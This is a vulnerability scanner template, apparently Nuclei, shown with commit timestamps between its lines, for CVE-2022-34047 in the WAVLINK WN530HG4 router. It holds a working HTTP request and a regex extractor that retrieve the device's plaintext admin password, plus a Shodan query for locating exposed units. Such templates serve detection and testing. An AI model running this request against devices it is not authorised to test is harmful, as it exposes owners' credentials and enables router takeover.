2022-07-20 19:39:27 +00:00
id : CVE-2022-34047
info :
2023-02-03 17:29:04 +00:00
name : WAVLINK WN530HG4 - Improper Access Control
2022-07-20 19:39:27 +00:00
author : For3stCo1d
severity : high
description : |
2023-02-03 16:52:21 +00:00
WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-07-20 19:39:27 +00:00
reference :
- https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
2022-08-02 09:31:02 +00:00
- http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html
2023-02-03 16:52:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-34047
2022-07-26 13:45:11 +00:00
classification :
2022-07-28 11:33:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-07-26 13:45:11 +00:00
cve-id : CVE-2022-34047
2022-07-28 11:33:27 +00:00
cwe-id : CWE-668
2023-04-12 10:55:48 +00:00
epss-score : 0.32795
2022-07-28 11:33:27 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-07-28 11:33:27 +00:00
shodan-query : http.title:"Wi-Fi APP Login"
verified : "true"
2022-08-27 04:41:18 +00:00
tags : cve2022,wavlink,router,exposure,packetstorm,cve
2022-07-20 19:39:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-20 19:54:47 +00:00
- raw :
- |
GET /set_safety.shtml?r=52300 HTTP/1.1
Host : {{Hostname}}
2022-07-20 19:39:27 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-07-21 08:03:57 +00:00
- 'var syspasswd="'
2022-07-20 19:54:47 +00:00
- '<title>APP</title>'
2022-07-20 19:39:27 +00:00
condition : and
- type : status
status :
- 200
extractors :
- type : regex
regex :
- 'syspasswd="(.+?)"'
2023-02-03 16:52:21 +00:00
# Enhanced by md on 2023/02/03